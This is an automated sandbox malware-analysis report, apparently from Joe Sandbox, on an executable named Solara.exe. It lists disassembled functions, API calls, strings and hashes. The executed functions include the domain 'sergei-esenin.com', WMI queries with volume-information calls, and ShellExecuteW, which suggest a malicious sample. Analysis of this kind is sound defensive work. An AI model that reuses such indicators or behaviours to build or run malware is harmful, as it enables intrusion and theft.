Part of subcall function 00C93E4B: WideCharToMultiByte.KERNEL32(00C79714,00000000,00000000,00000000,00000000,00000000,000000FF,0000FDE9,00000000,00000000,00000000,?,00C91CB6,00000000,00000000,00C79714), ref: 00C93EF7

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C96DE8
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C96E08

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 7b9f1a9616eba70aa5d94818e01d26ffbbff103e739be7b2083c2c49b1d2f1a0
Instruction ID: 37b3f55d2d43e28263cdf36736301279fd6e37f0fe9e9f813e8404fa22ca8f5f
Opcode Fuzzy Hash: 7b9f1a9616eba70aa5d94818e01d26ffbbff103e739be7b2083c2c49b1d2f1a0
Instruction Fuzzy Hash: AF1184F65015167FAF1127B69C8EEBF796CDF8A3983100024F51292141FB349E01A271

Function 00C2A7E6 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2A7ED
std::_Lockit::_Lockit.LIBCPMT ref: 00C2A7F7
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2A89E
Concurrency::cancel_current_task.LIBCPMT ref: 00C2A8A9

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
String ID:
API String ID: 4244582100-0
Opcode ID: 29767b65b6de1e39a47b73f11de93f65e5eee9b0a93c535b606dcdcec0510467
Instruction ID: 0ceeeb62dabbb0fb9ed6d404ee16bf18fd66cd461436a038125a5d5d9e5afedc
Opcode Fuzzy Hash: 29767b65b6de1e39a47b73f11de93f65e5eee9b0a93c535b606dcdcec0510467
Instruction Fuzzy Hash: 80215C34A0062A9FCB08EF14D891AADB775FF49710F008459E9269B7E1DB70ED51CF81

Function 00C91363 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 00C91379
GetLastError.KERNEL32(?,?,?,?), ref: 00C91386
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 00C913AC
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00C913D2

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: d636973d8147ce75e799f91795849c169114b9ceb1783e4ba5bc2a05e13de960
Instruction ID: 8a37bfa01f43f4d8126b13ba17d1744d85aa78b23b6c1f3a45bdb8d634176986
Opcode Fuzzy Hash: d636973d8147ce75e799f91795849c169114b9ceb1783e4ba5bc2a05e13de960
Instruction Fuzzy Hash: 4C11577180121AFBCF109FA5CC4AA9E3F79FF01364F148148F924921A0D731CA50DBA0

Function 00CA2DBB Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 00CA2DD5
GetLastError.KERNEL32 ref: 00CA2DE1

Part of subcall function 00CA2E8A: CloseHandle.KERNEL32(FFFFFFFE,00CA2ED4,?,00C9E9B6,00000000,00000001,00000000,74DEF550,?,00C8EF12,74DEF550,00000000,00000000,74DEF550,74DEF550), ref: 00CA2E9A

___initconout.LIBCMT ref: 00CA2DF1

Part of subcall function 00CA2E4C: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CA2E7B,00C9E9A3,74DEF550,?,00C8EF12,74DEF550,00000000,00000000,74DEF550), ref: 00CA2E5F

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 00CA2E05

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 65f5249a8441483fe71fc2778d22b0a93c3f54b77fe16f41acf229f4ac34c0ac
Instruction ID: 6c8f85d9b8398fc1f95705562ac8c80ca8584b37e274c0bed68ebfecefa50b66
Opcode Fuzzy Hash: 65f5249a8441483fe71fc2778d22b0a93c3f54b77fe16f41acf229f4ac34c0ac
Instruction Fuzzy Hash: 6AF05E36100212BBCB221BDADC09B4A7FA6FB8A355B140414F69AC2530DB329890EF60

Function 00CA2EA1 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00C9E9B6,00000000,00000001,00000000,74DEF550,?,00C8EF12,74DEF550,00000000,00000000), ref: 00CA2EB8
GetLastError.KERNEL32(?,00C9E9B6,00000000,00000001,00000000,74DEF550,?,00C8EF12,74DEF550,00000000,00000000,74DEF550,74DEF550,?,00C8F4E3,00000000), ref: 00CA2EC4

Part of subcall function 00CA2E8A: CloseHandle.KERNEL32(FFFFFFFE,00CA2ED4,?,00C9E9B6,00000000,00000001,00000000,74DEF550,?,00C8EF12,74DEF550,00000000,00000000,74DEF550,74DEF550), ref: 00CA2E9A

___initconout.LIBCMT ref: 00CA2ED4

Part of subcall function 00CA2E4C: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CA2E7B,00C9E9A3,74DEF550,?,00C8EF12,74DEF550,00000000,00000000,74DEF550), ref: 00CA2E5F

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00C9E9B6,00000000,00000001,00000000,74DEF550,?,00C8EF12,74DEF550,00000000,00000000,74DEF550), ref: 00CA2EE9

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 13f53288ef58ed022d369f5123daf44e8acad5c2c2a08fcecd544ce5b8ffeff3
Instruction ID: f279689c5540c79b1ba1252f39526aee35038b6df020f21c1e6a19d2c0e7e1f1
Opcode Fuzzy Hash: 13f53288ef58ed022d369f5123daf44e8acad5c2c2a08fcecd544ce5b8ffeff3
Instruction Fuzzy Hash: E2F0C73650012ABBCF221FD5DC09B9E3F26FB0A3A5F044110FE1996571D73289A0EBD1

Function 00C8A284 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00C8A3FB

Strings

-, xrefs: 00C8A34C
+, xrefs: 00C8A359

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: __aulldiv
String ID: +$-
API String ID: 3732870572-2137968064
Opcode ID: cda346dd4674985bdf08c3b03dfe51d17944bf8a7ab055efd559bbad2b7b6b67
Instruction ID: 79f07826f1a5071ca94497c0caa71f534d802d069f098aaf2446cd2f9c7115a8
Opcode Fuzzy Hash: cda346dd4674985bdf08c3b03dfe51d17944bf8a7ab055efd559bbad2b7b6b67
Instruction Fuzzy Hash: 87A12530D00258AFEF24EE69C8507EE7BA0EF55328F14855BE8749B291D270DA02DB5A

Function 00C22CDB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00C22CE2
_strlen.LIBCMT ref: 00C22CFC

Strings

0Gx, xrefs: 00C22E37, 00C22E9A

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: H_prolog3_catch_strlen
String ID: 0Gx
API String ID: 3133806014-986455118
Opcode ID: 1280900f2f0437f61e642f94039e745b1035a80dbfb3d669aa99e4b71f82de43
Instruction ID: eda11f4913ba32ff356bb1e5d67ca8055ea3815e2917e2485b804647061a5507
Opcode Fuzzy Hash: 1280900f2f0437f61e642f94039e745b1035a80dbfb3d669aa99e4b71f82de43
Instruction Fuzzy Hash: 91715D75E00269AFCB14DF99D4809ECBBF1BF48310B25825AE528AB7A1DB319E41DF50

Function 00C4E2E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 184COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00C4E447

Strings

-, xrefs: 00C4E475
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00C4E3A5, 00C4E3DC, 00C4E3E1

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: eb6445508ec8178ab08732ab4faa48335fcf8b0ba1adb121f50e6c782904266e
Instruction ID: 95a6984235b668ec3b42f5a4d7d57d36e2e26959588431f248d836e1d7bfb18e
Opcode Fuzzy Hash: eb6445508ec8178ab08732ab4faa48335fcf8b0ba1adb121f50e6c782904266e
Instruction Fuzzy Hash: 8851F470E04259AFDF268FBE84857BEBFF9BF05310F168469E4A1D7251D2748A418B50

Function 00C22F86 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00C22F8D
_strlen.LIBCMT ref: 00C22FA5

Strings

input string: , xrefs: 00C22FA0, 00C2306B

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: H_prolog3_catch_strlen
String ID: input string:
API String ID: 3133806014-2984214493
Opcode ID: 289562c34b058e96ac54cc0409d2effac0e0aad2505a6f12a1dea24212267e39
Instruction ID: d5efee6835f4eb392dbfc782e253ce021f648f5fb70a83590fdce19923133818
Opcode Fuzzy Hash: 289562c34b058e96ac54cc0409d2effac0e0aad2505a6f12a1dea24212267e39
Instruction Fuzzy Hash: 5D419975B002649FC720EB98E9859ACBBF1BF48720F244299E524977D1CB759E83CB70

Function 00C596A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00C596BC
DName::DName.LIBVCRUNTIME ref: 00C59741

Strings

A, xrefs: 00C59721

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: NameName::
String ID: A
API String ID: 1333004437-3554254475
Opcode ID: c4b54b76e7381d0a4862e8f594472aec13d6fc94d9e5238991c957bae1ba34da
Instruction ID: ccc61a98005737215b52b046d30c115833b16e345dd2c3c587f1c5d2c4e46325
Opcode Fuzzy Hash: c4b54b76e7381d0a4862e8f594472aec13d6fc94d9e5238991c957bae1ba34da
Instruction Fuzzy Hash: 75217C78900208EFDF00DFA4D851AAD7B71EB08341F18809AF8559B262DB319ACADB48

Function 00C2A416 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C2A41D

Strings

true, xrefs: 00C2A487
false, xrefs: 00C2A474

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: H_prolog3_
String ID: false$true
API String ID: 2427045233-2658103896
Opcode ID: c462ce06bffdcdc859fcff1b31207bd82d7e624931fcca45f075f8c7961a3619
Instruction ID: 15928a1b0bffc05d2b85262ccdd1c5b513dbbd2b016d0ff5764b6ae9e9d021c3
Opcode Fuzzy Hash: c462ce06bffdcdc859fcff1b31207bd82d7e624931fcca45f075f8c7961a3619
Instruction Fuzzy Hash: C511E2B5901754AFCB20EFB4E841B8ABBF4BF05300F04856AF1A58BA51EBB0E508DB51

Function 00C56139 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00C56156

Part of subcall function 00C5CC2D: _vsnprintf.LEGACY_STDIO_DEFINITIONS ref: 00C5CC3D

swprintf.LIBCMT ref: 00C56179

Part of subcall function 00C2C4F2: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C2C504

Strings

%lf, xrefs: 00C5614C, 00C56151, 00C56176

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ___swprintf_l__vswprintf_c_l_vsnprintfswprintf
String ID: %lf
API String ID: 3672277462-2891890143
Opcode ID: e9f0a1b82f82fc855c1ff69e8ec34a4e9eb818c77330bf049daba57c2924cd5a
Instruction ID: f71a5696d0ab4ff5951b0d1356970025b49c89cdebda70032f3168c2033e40ea
Opcode Fuzzy Hash: e9f0a1b82f82fc855c1ff69e8ec34a4e9eb818c77330bf049daba57c2924cd5a
Instruction Fuzzy Hash: 05F0F0B9100118BADB15AB84DC8AFBF7F6CDF85395F014098FA8816242DB356E05E3B5

Function 00C56199 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00C561B2

Part of subcall function 00C5CC2D: _vsnprintf.LEGACY_STDIO_DEFINITIONS ref: 00C5CC3D

swprintf.LIBCMT ref: 00C561D5

Part of subcall function 00C2C4F2: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C2C504

Strings

%lf, xrefs: 00C561A8, 00C561AD, 00C561D2

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ___swprintf_l__vswprintf_c_l_vsnprintfswprintf
String ID: %lf
API String ID: 3672277462-2891890143
Opcode ID: e18546b3fabb63f51ba93346a37418d9f82eace003b91639c34964507b990b37
Instruction ID: 2e60ce095ac6870c4b4d3a3885cf1c6efe6e264ffda1c5836c35876132e1b5c5
Opcode Fuzzy Hash: e18546b3fabb63f51ba93346a37418d9f82eace003b91639c34964507b990b37
Instruction Fuzzy Hash: 5BF024B5100018BADB147B84CC8AFBF3B6CDF45395F018098FA8817242CB35AE05E3B5

Function 00C21803 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C2180A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C21842

Part of subcall function 00C267B5: _Yarn.LIBCPMT ref: 00C267D4
Part of subcall function 00C267B5: _Yarn.LIBCPMT ref: 00C267F8

Strings

bad locale name, xrefs: 00C21850

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 6299b79563800ab578a81b269d6cd00c662efe1a8847b986a3372ef499b28b47
Instruction ID: 919a678f6bceec02c8a29e57b2a8936e4bcc4b3cbf0d9501f01003dc0e41874c
Opcode Fuzzy Hash: 6299b79563800ab578a81b269d6cd00c662efe1a8847b986a3372ef499b28b47
Instruction Fuzzy Hash: 19F01772545B509F83309F7AA481443FBE4BE283107948E2FE1DEC3E11D730A404CB6A

Analysis Process: Solara.exePID: 6812, Parent PID: 6744COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.5%
Total number of Nodes:	141
Total number of Limit Nodes:	10

Executed Functions

Function 00411183 Relevance: 36.3, APIs: 2, Strings: 18, Instructions: 1275COMMON

Download Yara Rule

Strings

abv>, xrefs: 00411ADD
elyx, xrefs: 00411A7B
tp~&, xrefs: 00411AA7
ft`., xrefs: 00411A91
c`rX, xrefs: 00411A70
sergei-esenin.com, xrefs: 00411551, 00411DD4
B#A, xrefs: 00412336
;&1, xrefs: 00411A9C
WU, xrefs: 00411CAE
:+*), xrefs: 00411CCF
mjk), xrefs: 00411A86
hi, xrefs: 004114A0
KJML, xrefs: 00412275
[Y, xrefs: 00411CA3
/=-, xrefs: 00411CC4
)5*, xrefs: 00411B7E
SQ, xrefs: 00411CB9
B920DB2BDB2EE9A1DA2CDA78553EAC6B, xrefs: 00411183

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID:
String ID: ;&1$:+*)$B#A$B920DB2BDB2EE9A1DA2CDA78553EAC6B$KJML$abv>$c`rX$elyx$ft`.$hi$mjk)$sergei-esenin.com$tp~&$)5*$/=-$SQ$WU$[Y
API String ID: 0-669293385
Opcode ID: 07e78d5633ede50bd510389c1d1614e4d1a6a1781b0877a65bb290c4884eef9f
Instruction ID: 1ab48516a69e41e5a5d48a26003f25f5f4dfab9b2bb2c9dfc8c5748784172516
Opcode Fuzzy Hash: 07e78d5633ede50bd510389c1d1614e4d1a6a1781b0877a65bb290c4884eef9f
Instruction Fuzzy Hash: 0A9234B15093908BD3209F25D8917EFBBE1AFD2308F18492DE4C95B392DB794905CB8B

Function 0043C516 Relevance: 19.9, APIs: 9, Strings: 2, Instructions: 606
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(?), ref: 0043C5B4
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,00000000), ref: 0043C5F7
SysAllocString.OLEAUT32(?), ref: 0043C637
SysAllocString.OLEAUT32(00000018), ref: 0043C70B
VariantInit.OLEAUT32(?), ref: 0043C781
VariantClear.OLEAUT32(00000019), ref: 0043C8FA
VariantClear.OLEAUT32(00000019), ref: 0043C911
SysFreeString.OLEAUT32(?), ref: 0043C992
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043C9CB

Strings

Lgfe, xrefs: 0043C610
K*, xrefs: 0043C700

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: String$AllocVariant$Clear$BlanketFreeInformationInitProxyVolume
String ID: K*$Lgfe
API String ID: 166343141-1944196812
Opcode ID: 92e96b66aff5ce9aaef89e422022859700a6dbda2e10e98f07d9ed25b8de3740
Instruction ID: 9bbedc36a9c05e1e6ed74e899277d5afd5f395ce79edc15d664a50c967b996af
Opcode Fuzzy Hash: 92e96b66aff5ce9aaef89e422022859700a6dbda2e10e98f07d9ed25b8de3740
Instruction Fuzzy Hash: 8F122179604700CFD724CF29D891B6AB7F1FB8A315F14992DE5868B3A2D738E406CB48

Function 0040CF50 Relevance: 7.9, APIs: 5, Instructions: 416
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,B726891B,0044A3DA,?,00000000,00000005), ref: 0040D209
GetCurrentThreadId.KERNEL32 ref: 0040D21C
GetInputState.USER32 ref: 0040D34B
